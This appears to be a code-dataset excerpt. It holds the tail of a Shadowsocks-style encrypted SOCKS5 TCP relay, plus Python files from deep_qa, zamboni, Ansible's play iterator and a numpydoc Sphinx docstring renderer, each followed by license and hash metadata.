self._update_stream(STREAM_DOWN, WAIT_STATUS_READING)
return
except (OSError, IOError) as e:
logging.error(e)
if self._config['verbose']:
traceback.print_exc()
self.destroy()
def _on_local_read(self):
# handle all local read events and dispatch them to methods for
# each stage
self._update_activity()
if not self._local_sock:
return
is_local = self._is_local
data = None
try:
data = self._local_sock.recv(BUF_SIZE)
except (OSError, IOError) as e:
if eventloop.errno_from_exception(e) in \
(errno.ETIMEDOUT, errno.EAGAIN, errno.EWOULDBLOCK):
return
if not data:
self.destroy()
return
if not is_local:
data = self._encryptor.decrypt(data)
if not data:
return
if self._stage == STAGE_STREAM:
if self._is_local:
data = self._encryptor.encrypt(data)
self._write_to_sock(data, self._remote_sock)
return
elif is_local and self._stage == STAGE_INIT:
# TODO check auth method
self._write_to_sock(b'\x05\00', self._local_sock)
self._stage = STAGE_ADDR
return
elif self._stage == STAGE_CONNECTING:
self._handle_stage_connecting(data)
elif (is_local and self._stage == STAGE_ADDR) or \
(not is_local and self._stage == STAGE_INIT):
self._handle_stage_addr(data)
def _on_remote_read(self):
# handle all remote read events
self._update_activity()
data = None
try:
data = self._remote_sock.recv(BUF_SIZE)
except (OSError, IOError) as e:
if eventloop.errno_from_exception(e) in \
(errno.ETIMEDOUT, errno.EAGAIN, errno.EWOULDBLOCK):
return
if not data:
self.destroy()
return
if self._is_local:
data = self._encryptor.decrypt(data)
else:
data = self._encryptor.encrypt(data)
try:
self._write_to_sock(data, self._local_sock)
except Exception as e:
logging.error(e)
if self._config['verbose']:
traceback.print_exc()
# TODO use logging when debug completed
self.destroy()
def _on_local_write(self):
# handle local writable event
if self._data_to_write_to_local:
data = b''.join(self._data_to_write_to_local)
self._data_to_write_to_local = []
self._write_to_sock(data, self._local_sock)
else:
self._update_stream(STREAM_DOWN, WAIT_STATUS_READING)
def _on_remote_write(self):
# handle remote writable event
self._stage = STAGE_STREAM
if self._data_to_write_to_remote:
data = b''.join(self._data_to_write_to_remote)
self._data_to_write_to_remote = []
self._write_to_sock(data, self._remote_sock)
else:
self._update_stream(STREAM_UP, WAIT_STATUS_READING)
def _on_local_error(self):
logging.debug('got local error')
if self._local_sock:
logging.error(eventloop.get_sock_error(self._local_sock))
self.destroy()
def _on_remote_error(self):
logging.debug('got remote error')
if self._remote_sock:
logging.error(eventloop.get_sock_error(self._remote_sock))
self.destroy()
def handle_event(self, sock, event):
# handle all events in this handler and dispatch them to methods
if self._stage == STAGE_DESTROYED:
logging.debug('ignore handle_event: destroyed')
return
# order is important
if sock == self._remote_sock:
if event & eventloop.POLL_ERR:
self._on_remote_error()
if self._stage == STAGE_DESTROYED:
return
if event & (eventloop.POLL_IN | eventloop.POLL_HUP):
self._on_remote_read()
if self._stage == STAGE_DESTROYED:
return
if event & eventloop.POLL_OUT:
self._on_remote_write()
elif sock == self._local_sock:
if event & eventloop.POLL_ERR:
self._on_local_error()
if self._stage == STAGE_DESTROYED:
return
if event & (eventloop.POLL_IN | eventloop.POLL_HUP):
self._on_local_read()
if self._stage == STAGE_DESTROYED:
return
if event & eventloop.POLL_OUT:
self._on_local_write()
else:
logging.warn('unknown socket')
def _log_error(self, e):
logging.error('%s when handling connection from %s:%d' %
(e, self._client_address[0], self._client_address[1]))
def destroy(self):
# destroy the handler and release any resources
# promises:
# 1. destroy won't make another destroy() call inside
# 2. destroy releases resources so it prevents future call to destroy
# 3. destroy won't raise any exceptions
# if any of the promises are broken, it indicates a bug has been
# introduced! mostly likely memory leaks, etc
if self._stage == STAGE_DESTROYED:
# this couldn't happen
logging.debug('already destroyed')
return
self._stage = STAGE_DESTROYED
if self._remote_address:
logging.debug('destroy: %s:%d' %
self._remote_address)
else:
logging.debug('destroy')
if self._remote_sock:
logging.debug('destroying remote')
self._loop.remove(self._remote_sock)
del self._fd_to_handlers[self._remote_sock.fileno()]
self._remote_sock.close()
self._remote_sock = None
if self._local_sock:
logging.debug('destroying local')
self._loop.remove(self._local_sock)
del self._fd_to_handlers[self._local_sock.fileno()]
self._local_sock.close()
self._local_sock = None
self._dns_resolver.remove_callback(self._handle_dns_resolved)
self._server.remove_handler(self)
class TCPRelay(object):
def __init__(self, config, dns_resolver, is_local):
self._config = config
self._is_local = is_local
self._dns_resolver = dns_resolver
self._closed = False
self._eventloop = None
self._fd_to_handlers = {}
self._last_time = time.time()
self._timeout = config['timeout']
self._timeouts = [] # a list for all the handlers
# we trim the timeouts once a while
self._timeout_offset = 0 # last checked position for timeout
self._handler_to_timeouts = {} # key: handler value: index in timeouts
if is_local:
listen_addr = config['local_address']
listen_port = config['local_port']
else:
listen_addr = config['server']
listen_port = config['server_port']
self._listen_port = listen_port
addrs = socket.getaddrinfo(listen_addr, listen_port, 0,
socket.SOCK_STREAM, socket.SOL_TCP)
if len(addrs) == 0:
raise Exception("can't get addrinfo for %s:%d" %
(listen_addr, listen_port))
af, socktype, proto, canonname, sa = addrs[0]
server_socket = socket.socket(af, socktype, proto)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_socket.bind(sa)
server_socket.setblocking(False)
if config['fast_open']:
try:
server_socket.setsockopt(socket.SOL_TCP, 23, 5)
except socket.error:
logging.error('warning: fast open is not available')
self._config['fast_open'] = False
server_socket.listen(1024)
self._server_socket = server_socket
def add_to_loop(self, loop):
if self._eventloop:
raise Exception('already add to loop')
if self._closed:
raise Exception('already closed')
self._eventloop = loop
loop.add_handler(self._handle_events)
self._eventloop.add(self._server_socket,
eventloop.POLL_IN | eventloop.POLL_ERR)
def remove_handler(self, handler):
index = self._handler_to_timeouts.get(hash(handler), -1)
if index >= 0:
# delete is O(n), so we just set it to None
self._timeouts[index] = None
del self._handler_to_timeouts[hash(handler)]
def update_activity(self, handler):
# set handler to active
now = int(time.time())
if now - handler.last_activity < TIMEOUT_PRECISION:
# thus we can lower timeout modification frequency
return
handler.last_activity = now
index = self._handler_to_timeouts.get(hash(handler), -1)
if index >= 0:
# delete is O(n), so we just set it to None
self._timeouts[index] = None
length = len(self._timeouts)
self._timeouts.append(handler)
self._handler_to_timeouts[hash(handler)] = length
def _sweep_timeout(self):
# tornado's timeout memory management is more flexible than we need
# we just need a sorted last_activity queue and it's faster than heapq
# in fact we can do O(1) insertion/remove so we invent our own
if self._timeouts:
logging.log(utils.VERBOSE_LEVEL, 'sweeping timeouts')
now = time.time()
length = len(self._timeouts)
pos = self._timeout_offset
while pos < length:
handler = self._timeouts[pos]
if handler:
if now - handler.last_activity < self._timeout:
break
else:
if handler.remote_address:
logging.warn('timed out: %s:%d' %
handler.remote_address)
else:
logging.warn('timed out')
handler.destroy()
self._timeouts[pos] = None # free memory
pos += 1
else:
pos += 1
if pos > TIMEOUTS_CLEAN_SIZE and pos > length >> 1:
# clean up the timeout queue when it gets larger than half
# of the queue
self._timeouts = self._timeouts[pos:]
for key in self._handler_to_timeouts:
self._handler_to_timeouts[key] -= pos
pos = 0
self._timeout_offset = pos
def _handle_events(self, events):
# handle events and dispatch to handlers
for sock, fd, event in events:
if sock:
logging.log(utils.VERBOSE_LEVEL, 'fd %d %s', fd,
eventloop.EVENT_NAMES.get(event, event))
if sock == self._server_socket:
if event & eventloop.POLL_ERR:
# TODO
raise Exception('server_socket error')
try:
logging.debug('accept')
conn = self._server_socket.accept()
TCPRelayHandler(self, self._fd_to_handlers,
self._eventloop, conn[0], self._config,
self._dns_resolver, self._is_local)
except (OSError, IOError) as e:
error_no = eventloop.errno_from_exception(e)
if error_no in (errno.EAGAIN, errno.EINPROGRESS,
errno.EWOULDBLOCK):
continue
else:
logging.error(e)
if self._config['verbose']:
traceback.print_exc()
else:
if sock:
handler = self._fd_to_handlers.get(fd, None)
if handler:
handler.handle_event(sock, event)
else:
logging.warn('poll removed fd')
now = time.time()
if now - self._last_time > TIMEOUT_PRECISION:
self._sweep_timeout()
self._last_time = now
if self._closed:
if self._server_socket:
self._eventloop.remove(self._server_socket)
self._server_socket.close()
self._server_socket = None
logging.info('closed listen port %d', self._listen_port)
if not self._fd_to_handlers:
self._eventloop.remove_handler(self._handle_events)
def close(self, next_tick=False):
self._closed = True
if not next_tick:
self._server_socket.close()
| mit | 1,526,666,457,885,069,600 | 39.552891 | 79 | 0.53805 | false |
allenai/deep_qa | tests/training/multi_gpu_test.py | 2 | 1929 | # pylint: disable=no-self-use,invalid-name
from copy import deepcopy
import keras.backend as K
from deep_qa.common.params import Params
from deep_qa.models.text_classification import ClassificationModel
from deep_qa.testing.test_case import DeepQaTestCase
class TestMultiGpu(DeepQaTestCase):
def setUp(self):
super(TestMultiGpu, self).setUp()
self.write_true_false_model_files()
self.args = Params({
'num_gpus': 2,
})
def test_model_can_train_and_load(self):
self.ensure_model_trains_and_loads(ClassificationModel, self.args)
def test_model_can_train_and_load_with_generator(self):
args = self.args
args["data_generator"] = {"dynamic_batching": True, "padding_noise": 0.4}
self.ensure_model_trains_and_loads(ClassificationModel, args)
def test_variables_live_on_cpu(self):
model = self.get_model(ClassificationModel, self.args)
model.train()
trainable_variables = model.model.trainable_weights
for variable in trainable_variables:
# This is an odd quirk of tensorflow - the devices are actually named
# slightly differently from their scopes ... (i.e != "/cpu:0")
assert variable.device == "/cpu:0" or variable.device == ""
def test_multi_gpu_shares_variables(self):
multi_gpu_model = self.get_model(ClassificationModel, self.args)
single_gpu_args = deepcopy(self.args)
single_gpu_args["num_gpus"] = 1
single_gpu_model = self.get_model(ClassificationModel, single_gpu_args)
multi_gpu_model.train()
multi_gpu_variables = [x.name for x in multi_gpu_model.model.trainable_weights]
K.clear_session()
single_gpu_model.train()
single_gpu_variables = ["tower_0/" + x.name for x in single_gpu_model.model.trainable_weights]
assert single_gpu_variables == multi_gpu_variables
| apache-2.0 | -7,753,536,033,354,599,000 | 36.096154 | 102 | 0.667185 | false |
elysium001/zamboni | mkt/fireplace/serializers.py | 7 | 3426 | from django.template.defaultfilters import filesizeformat
from rest_framework import serializers
from mkt.webapps.serializers import SimpleAppSerializer, SimpleESAppSerializer
from mkt.websites.serializers import ESWebsiteSerializer, WebsiteSerializer
class BaseFireplaceAppSerializer(object):
def get_icons(self, app):
# Fireplace only requires 64px and 128px icons.
return {
64: app.get_icon_url(64),
128: app.get_icon_url(128)
}
# We don't care about the integer value of the file size in fireplace, we
# just want to display it to the user in a human-readable way.
def transform_file_size(self, obj, value):
if value:
return filesizeformat(value)
return None
class FireplaceAppSerializer(BaseFireplaceAppSerializer, SimpleAppSerializer):
class Meta(SimpleAppSerializer.Meta):
fields = ['author', 'banner_message', 'banner_regions', 'categories',
'content_ratings', 'current_version', 'description',
'device_types', 'file_size', 'homepage', 'hosted_url',
'icons', 'id', 'is_offline', 'is_packaged', 'last_updated',
'manifest_url', 'name', 'payment_required', 'premium_type',
'previews', 'price', 'price_locale', 'privacy_policy',
'promo_imgs', 'public_stats', 'release_notes', 'ratings',
'slug', 'status', 'support_email', 'support_url', 'tags',
'upsell', 'user']
exclude = []
class FireplaceESAppSerializer(BaseFireplaceAppSerializer,
SimpleESAppSerializer):
class Meta(SimpleESAppSerializer.Meta):
fields = FireplaceAppSerializer.Meta.fields
exclude = FireplaceAppSerializer.Meta.exclude
def get_user_info(self, app):
# Fireplace search should always be anonymous for extra-cacheability.
return None
class FeedFireplaceESAppSerializer(BaseFireplaceAppSerializer,
SimpleESAppSerializer):
"""
Serializer for Fireplace Feed pages (mostly detail pages). Needs
collection groups.
"""
class Meta(SimpleESAppSerializer.Meta):
fields = sorted(FireplaceAppSerializer.Meta.fields + ['group'])
exclude = FireplaceAppSerializer.Meta.exclude
class BaseFireplaceWebsiteSerializer(serializers.Serializer):
slug = serializers.SerializerMethodField('get_slug')
def get_slug(self, obj):
# Fake slug to help fireplace. Because of the {} characters this slug
# should never be available for apps.
return '{website-%s}' % obj.id
def get_icons(self, obj):
# Fireplace only requires 64px and 128px icons.
return {
64: obj.get_icon_url(64),
128: obj.get_icon_url(128)
}
class FireplaceWebsiteSerializer(BaseFireplaceWebsiteSerializer,
WebsiteSerializer):
class Meta(WebsiteSerializer.Meta):
fields = ['categories', 'description', 'device_types', 'icons', 'id',
'keywords', 'mobile_url', 'name', 'promo_imgs', 'short_name',
'slug', 'url']
class FireplaceESWebsiteSerializer(BaseFireplaceWebsiteSerializer,
ESWebsiteSerializer):
class Meta(ESWebsiteSerializer.Meta):
fields = FireplaceWebsiteSerializer.Meta.fields
| bsd-3-clause | -7,606,160,218,187,882,000 | 37.066667 | 79 | 0.639229 | false |
veger/ansible | lib/ansible/executor/play_iterator.py | 9 | 27180 | # (c) 2012-2014, Michael DeHaan <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import fnmatch
from ansible import constants as C
from ansible.module_utils.six import iteritems
from ansible.module_utils.parsing.convert_bool import boolean
from ansible.playbook.block import Block
from ansible.playbook.task import Task
from ansible.utils.display import Display
display = Display()
__all__ = ['PlayIterator']
class HostState:
def __init__(self, blocks):
self._blocks = blocks[:]
self.cur_block = 0
self.cur_regular_task = 0
self.cur_rescue_task = 0
self.cur_always_task = 0
self.cur_dep_chain = None
self.run_state = PlayIterator.ITERATING_SETUP
self.fail_state = PlayIterator.FAILED_NONE
self.pending_setup = False
self.tasks_child_state = None
self.rescue_child_state = None
self.always_child_state = None
self.did_rescue = False
self.did_start_at_task = False
def __repr__(self):
return "HostState(%r)" % self._blocks
def __str__(self):
def _run_state_to_string(n):
states = ["ITERATING_SETUP", "ITERATING_TASKS", "ITERATING_RESCUE", "ITERATING_ALWAYS", "ITERATING_COMPLETE"]
try:
return states[n]
except IndexError:
return "UNKNOWN STATE"
def _failed_state_to_string(n):
states = {1: "FAILED_SETUP", 2: "FAILED_TASKS", 4: "FAILED_RESCUE", 8: "FAILED_ALWAYS"}
if n == 0:
return "FAILED_NONE"
else:
ret = []
for i in (1, 2, 4, 8):
if n & i:
ret.append(states[i])
return "|".join(ret)
return ("HOST STATE: block=%d, task=%d, rescue=%d, always=%d, run_state=%s, fail_state=%s, pending_setup=%s, tasks child state? (%s), "
"rescue child state? (%s), always child state? (%s), did rescue? %s, did start at task? %s" % (
self.cur_block,
self.cur_regular_task,
self.cur_rescue_task,
self.cur_always_task,
_run_state_to_string(self.run_state),
_failed_state_to_string(self.fail_state),
self.pending_setup,
self.tasks_child_state,
self.rescue_child_state,
self.always_child_state,
self.did_rescue,
self.did_start_at_task,
))
def __eq__(self, other):
if not isinstance(other, HostState):
return False
for attr in ('_blocks', 'cur_block', 'cur_regular_task', 'cur_rescue_task', 'cur_always_task',
'run_state', 'fail_state', 'pending_setup', 'cur_dep_chain',
'tasks_child_state', 'rescue_child_state', 'always_child_state'):
if getattr(self, attr) != getattr(other, attr):
return False
return True
def get_current_block(self):
return self._blocks[self.cur_block]
def copy(self):
new_state = HostState(self._blocks)
new_state.cur_block = self.cur_block
new_state.cur_regular_task = self.cur_regular_task
new_state.cur_rescue_task = self.cur_rescue_task
new_state.cur_always_task = self.cur_always_task
new_state.run_state = self.run_state
new_state.fail_state = self.fail_state
new_state.pending_setup = self.pending_setup
new_state.did_rescue = self.did_rescue
new_state.did_start_at_task = self.did_start_at_task
if self.cur_dep_chain is not None:
new_state.cur_dep_chain = self.cur_dep_chain[:]
if self.tasks_child_state is not None:
new_state.tasks_child_state = self.tasks_child_state.copy()
if self.rescue_child_state is not None:
new_state.rescue_child_state = self.rescue_child_state.copy()
if self.always_child_state is not None:
new_state.always_child_state = self.always_child_state.copy()
return new_state
class PlayIterator:
# the primary running states for the play iteration
ITERATING_SETUP = 0
ITERATING_TASKS = 1
ITERATING_RESCUE = 2
ITERATING_ALWAYS = 3
ITERATING_COMPLETE = 4
# the failure states for the play iteration, which are powers
# of 2 as they may be or'ed together in certain circumstances
FAILED_NONE = 0
FAILED_SETUP = 1
FAILED_TASKS = 2
FAILED_RESCUE = 4
FAILED_ALWAYS = 8
def __init__(self, inventory, play, play_context, variable_manager, all_vars, start_at_done=False):
self._play = play
self._blocks = []
self._variable_manager = variable_manager
# Default options to gather
gather_subset = play_context.gather_subset
gather_timeout = play_context.gather_timeout
fact_path = play_context.fact_path
# Retrieve subset to gather
if self._play.gather_subset is not None:
gather_subset = self._play.gather_subset
# Retrieve timeout for gather
if self._play.gather_timeout is not None:
gather_timeout = self._play.gather_timeout
# Retrieve fact_path
if self._play.fact_path is not None:
fact_path = self._play.fact_path
setup_block = Block(play=self._play)
# Gathering facts with run_once would copy the facts from one host to
# the others.
setup_block.run_once = False
setup_task = Task(block=setup_block)
setup_task.action = 'setup'
setup_task.name = 'Gathering Facts'
setup_task.args = {
'gather_subset': gather_subset,
}
# Unless play is specifically tagged, gathering should 'always' run
if not self._play.tags:
setup_task.tags = ['always']
if gather_timeout:
setup_task.args['gather_timeout'] = gather_timeout
if fact_path:
setup_task.args['fact_path'] = fact_path
setup_task.set_loader(self._play._loader)
# short circuit fact gathering if the entire playbook is conditional
if self._play._included_conditional is not None:
setup_task.when = self._play._included_conditional[:]
setup_block.block = [setup_task]
setup_block = setup_block.filter_tagged_tasks(play_context, all_vars)
self._blocks.append(setup_block)
self.cache_block_tasks(setup_block)
for block in self._play.compile():
new_block = block.filter_tagged_tasks(play_context, all_vars)
if new_block.has_tasks():
self.cache_block_tasks(new_block)
self._blocks.append(new_block)
for handler_block in self._play.handlers:
self.cache_block_tasks(handler_block)
self._host_states = {}
start_at_matched = False
batch = inventory.get_hosts(self._play.hosts)
self.batch_size = len(batch)
for host in batch:
self._host_states[host.name] = HostState(blocks=self._blocks)
# if we're looking to start at a specific task, iterate through
# the tasks for this host until we find the specified task
if play_context.start_at_task is not None and not start_at_done:
while True:
(s, task) = self.get_next_task_for_host(host, peek=True)
if s.run_state == self.ITERATING_COMPLETE:
break
if task.name == play_context.start_at_task or fnmatch.fnmatch(task.name, play_context.start_at_task) or \
task.get_name() == play_context.start_at_task or fnmatch.fnmatch(task.get_name(), play_context.start_at_task):
start_at_matched = True
break
else:
self.get_next_task_for_host(host)
# finally, reset the host's state to ITERATING_SETUP
if start_at_matched:
self._host_states[host.name].did_start_at_task = True
self._host_states[host.name].run_state = self.ITERATING_SETUP
if start_at_matched:
# we have our match, so clear the start_at_task field on the
# play context to flag that we've started at a task (and future
# plays won't try to advance)
play_context.start_at_task = None
def get_host_state(self, host):
# Since we're using the PlayIterator to carry forward failed hosts,
# in the event that a previous host was not in the current inventory
# we create a stub state for it now
if host.name not in self._host_states:
self._host_states[host.name] = HostState(blocks=[])
return self._host_states[host.name].copy()
def cache_block_tasks(self, block):
# now a noop, we've changed the way we do caching and finding of
# original task entries, but just in case any 3rd party strategies
# are using this we're leaving it here for now
return
def get_next_task_for_host(self, host, peek=False):
display.debug("getting the next task for host %s" % host.name)
s = self.get_host_state(host)
task = None
if s.run_state == self.ITERATING_COMPLETE:
display.debug("host %s is done iterating, returning" % host.name)
return (s, None)
(s, task) = self._get_next_task_from_state(s, host=host, peek=peek)
if not peek:
self._host_states[host.name] = s
display.debug("done getting next task for host %s" % host.name)
display.debug(" ^ task is: %s" % task)
display.debug(" ^ state is: %s" % s)
return (s, task)
def _get_next_task_from_state(self, state, host, peek, in_child=False):
task = None
# try and find the next task, given the current state.
while True:
# try to get the current block from the list of blocks, and
# if we run past the end of the list we know we're done with
# this block
try:
block = state._blocks[state.cur_block]
except IndexError:
state.run_state = self.ITERATING_COMPLETE
return (state, None)
if state.run_state == self.ITERATING_SETUP:
# First, we check to see if we were pending setup. If not, this is
# the first trip through ITERATING_SETUP, so we set the pending_setup
# flag and try to determine if we do in fact want to gather facts for
# the specified host.
if not state.pending_setup:
state.pending_setup = True
# Gather facts if the default is 'smart' and we have not yet
# done it for this host; or if 'explicit' and the play sets
# gather_facts to True; or if 'implicit' and the play does
# NOT explicitly set gather_facts to False.
gathering = C.DEFAULT_GATHERING
implied = self._play.gather_facts is None or boolean(self._play.gather_facts, strict=False)
if (gathering == 'implicit' and implied) or \
(gathering == 'explicit' and boolean(self._play.gather_facts, strict=False)) or \
(gathering == 'smart' and implied and not (self._variable_manager._fact_cache.get(host.name, {}).get('module_setup', False))):
# The setup block is always self._blocks[0], as we inject it
# during the play compilation in __init__ above.
setup_block = self._blocks[0]
if setup_block.has_tasks() and len(setup_block.block) > 0:
task = setup_block.block[0]
else:
# This is the second trip through ITERATING_SETUP, so we clear
# the flag and move onto the next block in the list while setting
# the run state to ITERATING_TASKS
state.pending_setup = False
state.run_state = self.ITERATING_TASKS
if not state.did_start_at_task:
state.cur_block += 1
state.cur_regular_task = 0
state.cur_rescue_task = 0
state.cur_always_task = 0
state.child_state = None
elif state.run_state == self.ITERATING_TASKS:
# clear the pending setup flag, since we're past that and it didn't fail
if state.pending_setup:
state.pending_setup = False
# First, we check for a child task state that is not failed, and if we
# have one recurse into it for the next task. If we're done with the child
# state, we clear it and drop back to getting the next task from the list.
if state.tasks_child_state:
(state.tasks_child_state, task) = self._get_next_task_from_state(state.tasks_child_state, host=host, peek=peek, in_child=True)
if self._check_failed_state(state.tasks_child_state):
# failed child state, so clear it and move into the rescue portion
state.tasks_child_state = None
self._set_failed_state(state)
else:
# get the next task recursively
if task is None or state.tasks_child_state.run_state == self.ITERATING_COMPLETE:
# we're done with the child state, so clear it and continue
# back to the top of the loop to get the next task
state.tasks_child_state = None
continue
else:
# First here, we check to see if we've failed anywhere down the chain
# of states we have, and if so we move onto the rescue portion. Otherwise,
# we check to see if we've moved past the end of the list of tasks. If so,
# we move into the always portion of the block, otherwise we get the next
# task from the list.
if self._check_failed_state(state):
state.run_state = self.ITERATING_RESCUE
elif state.cur_regular_task >= len(block.block):
state.run_state = self.ITERATING_ALWAYS
else:
task = block.block[state.cur_regular_task]
# if the current task is actually a child block, create a child
# state for us to recurse into on the next pass
if isinstance(task, Block) or state.tasks_child_state is not None:
state.tasks_child_state = HostState(blocks=[task])
state.tasks_child_state.run_state = self.ITERATING_TASKS
# since we've created the child state, clear the task
# so we can pick up the child state on the next pass
task = None
state.cur_regular_task += 1
elif state.run_state == self.ITERATING_RESCUE:
# The process here is identical to ITERATING_TASKS, except instead
# we move into the always portion of the block.
if host.name in self._play._removed_hosts:
self._play._removed_hosts.remove(host.name)
if state.rescue_child_state:
(state.rescue_child_state, task) = self._get_next_task_from_state(state.rescue_child_state, host=host, peek=peek, in_child=True)
if self._check_failed_state(state.rescue_child_state):
state.rescue_child_state = None
self._set_failed_state(state)
else:
if task is None or state.rescue_child_state.run_state == self.ITERATING_COMPLETE:
state.rescue_child_state = None
continue
else:
if state.fail_state & self.FAILED_RESCUE == self.FAILED_RESCUE:
state.run_state = self.ITERATING_ALWAYS
elif state.cur_rescue_task >= len(block.rescue):
if len(block.rescue) > 0:
state.fail_state = self.FAILED_NONE
state.run_state = self.ITERATING_ALWAYS
state.did_rescue = True
else:
task = block.rescue[state.cur_rescue_task]
if isinstance(task, Block) or state.rescue_child_state is not None:
state.rescue_child_state = HostState(blocks=[task])
state.rescue_child_state.run_state = self.ITERATING_TASKS
task = None
state.cur_rescue_task += 1
elif state.run_state == self.ITERATING_ALWAYS:
# And again, the process here is identical to ITERATING_TASKS, except
# instead we either move onto the next block in the list, or we set the
# run state to ITERATING_COMPLETE in the event of any errors, or when we
# have hit the end of the list of blocks.
if state.always_child_state:
(state.always_child_state, task) = self._get_next_task_from_state(state.always_child_state, host=host, peek=peek, in_child=True)
if self._check_failed_state(state.always_child_state):
state.always_child_state = None
self._set_failed_state(state)
else:
if task is None or state.always_child_state.run_state == self.ITERATING_COMPLETE:
state.always_child_state = None
continue
else:
if state.cur_always_task >= len(block.always):
if state.fail_state != self.FAILED_NONE:
state.run_state = self.ITERATING_COMPLETE
else:
state.cur_block += 1
state.cur_regular_task = 0
state.cur_rescue_task = 0
state.cur_always_task = 0
state.run_state = self.ITERATING_TASKS
state.tasks_child_state = None
state.rescue_child_state = None
state.always_child_state = None
state.did_rescue = False
# we're advancing blocks, so if this was an end-of-role block we
# mark the current role complete
if block._eor and host.name in block._role._had_task_run and not in_child and not peek:
block._role._completed[host.name] = True
else:
task = block.always[state.cur_always_task]
if isinstance(task, Block) or state.always_child_state is not None:
state.always_child_state = HostState(blocks=[task])
state.always_child_state.run_state = self.ITERATING_TASKS
task = None
state.cur_always_task += 1
elif state.run_state == self.ITERATING_COMPLETE:
return (state, None)
# if something above set the task, break out of the loop now
if task:
break
return (state, task)
def _set_failed_state(self, state):
if state.run_state == self.ITERATING_SETUP:
state.fail_state |= self.FAILED_SETUP
state.run_state = self.ITERATING_COMPLETE
elif state.run_state == self.ITERATING_TASKS:
if state.tasks_child_state is not None:
state.tasks_child_state = self._set_failed_state(state.tasks_child_state)
else:
state.fail_state |= self.FAILED_TASKS
if state._blocks[state.cur_block].rescue:
state.run_state = self.ITERATING_RESCUE
elif state._blocks[state.cur_block].always:
state.run_state = self.ITERATING_ALWAYS
else:
state.run_state = self.ITERATING_COMPLETE
elif state.run_state == self.ITERATING_RESCUE:
if state.rescue_child_state is not None:
state.rescue_child_state = self._set_failed_state(state.rescue_child_state)
else:
state.fail_state |= self.FAILED_RESCUE
if state._blocks[state.cur_block].always:
state.run_state = self.ITERATING_ALWAYS
else:
state.run_state = self.ITERATING_COMPLETE
elif state.run_state == self.ITERATING_ALWAYS:
if state.always_child_state is not None:
state.always_child_state = self._set_failed_state(state.always_child_state)
else:
state.fail_state |= self.FAILED_ALWAYS
state.run_state = self.ITERATING_COMPLETE
return state
def mark_host_failed(self, host):
s = self.get_host_state(host)
display.debug("marking host %s failed, current state: %s" % (host, s))
s = self._set_failed_state(s)
display.debug("^ failed state is now: %s" % s)
self._host_states[host.name] = s
self._play._removed_hosts.append(host.name)
def get_failed_hosts(self):
return dict((host, True) for (host, state) in iteritems(self._host_states) if self._check_failed_state(state))
def _check_failed_state(self, state):
if state is None:
return False
elif state.run_state == self.ITERATING_RESCUE and self._check_failed_state(state.rescue_child_state):
return True
elif state.run_state == self.ITERATING_ALWAYS and self._check_failed_state(state.always_child_state):
return True
elif state.fail_state != self.FAILED_NONE:
if state.run_state == self.ITERATING_RESCUE and state.fail_state & self.FAILED_RESCUE == 0:
return False
elif state.run_state == self.ITERATING_ALWAYS and state.fail_state & self.FAILED_ALWAYS == 0:
return False
else:
return not state.did_rescue
elif state.run_state == self.ITERATING_TASKS and self._check_failed_state(state.tasks_child_state):
cur_block = self._blocks[state.cur_block]
if len(cur_block.rescue) > 0 and state.fail_state & self.FAILED_RESCUE == 0:
return False
else:
return True
return False
def is_failed(self, host):
s = self.get_host_state(host)
return self._check_failed_state(s)
def get_active_state(self, state):
'''
Finds the active state, recursively if necessary when there are child states.
'''
if state.run_state == self.ITERATING_TASKS and state.tasks_child_state is not None:
return self.get_active_state(state.tasks_child_state)
elif state.run_state == self.ITERATING_RESCUE and state.rescue_child_state is not None:
return self.get_active_state(state.rescue_child_state)
elif state.run_state == self.ITERATING_ALWAYS and state.always_child_state is not None:
return self.get_active_state(state.always_child_state)
return state
def get_original_task(self, host, task):
# now a noop because we've changed the way we do caching
return (None, None)
def _insert_tasks_into_state(self, state, task_list):
# if we've failed at all, or if the task list is empty, just return the current state
if state.fail_state != self.FAILED_NONE and state.run_state not in (self.ITERATING_RESCUE, self.ITERATING_ALWAYS) or not task_list:
return state
if state.run_state == self.ITERATING_TASKS:
if state.tasks_child_state:
state.tasks_child_state = self._insert_tasks_into_state(state.tasks_child_state, task_list)
else:
target_block = state._blocks[state.cur_block].copy()
before = target_block.block[:state.cur_regular_task]
after = target_block.block[state.cur_regular_task:]
target_block.block = before + task_list + after
state._blocks[state.cur_block] = target_block
elif state.run_state == self.ITERATING_RESCUE:
if state.rescue_child_state:
state.rescue_child_state = self._insert_tasks_into_state(state.rescue_child_state, task_list)
else:
target_block = state._blocks[state.cur_block].copy()
before = target_block.rescue[:state.cur_rescue_task]
after = target_block.rescue[state.cur_rescue_task:]
target_block.rescue = before + task_list + after
state._blocks[state.cur_block] = target_block
elif state.run_state == self.ITERATING_ALWAYS:
if state.always_child_state:
state.always_child_state = self._insert_tasks_into_state(state.always_child_state, task_list)
else:
target_block = state._blocks[state.cur_block].copy()
before = target_block.always[:state.cur_always_task]
after = target_block.always[state.cur_always_task:]
target_block.always = before + task_list + after
state._blocks[state.cur_block] = target_block
return state
def add_tasks(self, host, task_list):
self._host_states[host.name] = self._insert_tasks_into_state(self.get_host_state(host), task_list)
| gpl-3.0 | -2,962,201,180,798,236,000 | 46.768014 | 149 | 0.563355 | false |
wadetb/tinynumpy | docs/ext/docscrape_sphinx.py | 9 | 7751 | import re
import inspect
import textwrap
import pydoc
import sphinx
from docscrape import NumpyDocString, FunctionDoc, ClassDoc
class SphinxDocString(NumpyDocString):
def __init__(self, docstring, config={}):
self.use_plots = config.get('use_plots', False)
NumpyDocString.__init__(self, docstring, config=config)
# string conversion routines
def _str_header(self, name, symbol='`'):
return ['.. rubric:: ' + name, '']
def _str_field_list(self, name):
return [':' + name + ':']
def _str_indent(self, doc, indent=4):
out = []
for line in doc:
out += [' ' * indent + line]
return out
def _str_signature(self):
return ['']
if self['Signature']:
return ['``%s``' % self['Signature']] + ['']
else:
return ['']
def _str_summary(self):
return self['Summary'] + ['']
def _str_extended_summary(self):
return self['Extended Summary'] + ['']
def _str_param_list(self, name):
out = []
if self[name]:
out += self._str_field_list(name)
